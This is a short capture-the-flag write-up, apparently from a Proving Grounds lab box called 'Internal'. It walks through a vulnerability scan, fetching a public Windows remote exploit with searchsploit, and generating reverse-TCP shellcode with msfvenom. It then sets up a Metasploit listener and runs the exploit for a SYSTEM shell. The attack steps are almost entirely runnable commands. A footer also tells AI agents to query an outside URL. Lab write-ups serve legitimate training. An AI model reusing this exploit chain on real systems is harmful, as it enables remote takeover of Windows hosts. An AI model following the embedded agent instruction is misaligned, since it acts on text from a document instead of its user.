# Internal

## nmap

```
mkdir nmap
sudo rustscan -a 192.168.201.40 --ulimit 5000 -- -T4 -A -oA nmap/all-ports-service-scan --scripts vuln
```

Looks like there's a CVE detected by nmap

<div align="left"><img src="/files/-MkONxhge2HRXA1YZV1-" alt=""></div>

## Exploitation

Let's find the source code of the exploit of this CVE.

<div align="left"><img src="/files/-MkOOIrRjjFgxujRJGe-" alt=""></div>

Mirror the exploit to your local machine

```
searchsploit -m windows/remote/40280.py   
```

Create shellcode with `msfvenom` as per exploit instruction.

```
msfvenom -p windows/shell/reverse_tcp LHOST=192.168.49.201 LPORT=4444  EXITFUNC=thread  -f python -v shell
```

<div align="left"><img src="/files/-MkOPCrmREwkkGKjTq01" alt=""></div>

Copy the shellcode and replace it on the source code

<div align="left"><img src="/files/-MkOPIb7U4hhKfzhOiqW" alt=""></div>

Open `msfconsole` and execute the following

```
use exploit/multi/handler
set payload windows/shell/reverse_tcp
set lhost tun0
set exitfunc thread
run
```

<div align="left"><img src="/files/-MkOQ0uePXQNbjzykaWR" alt=""></div>

Run the exploit

```
python 40280.py 192.168.201.40 
```

And you should receive your `nt authority\system` shell.

![](/files/-MkOQRRZpO-lTiCnHwae)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://psdon.gitbook.io/hackworld/writeup/proving-grounds-practice/internal.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.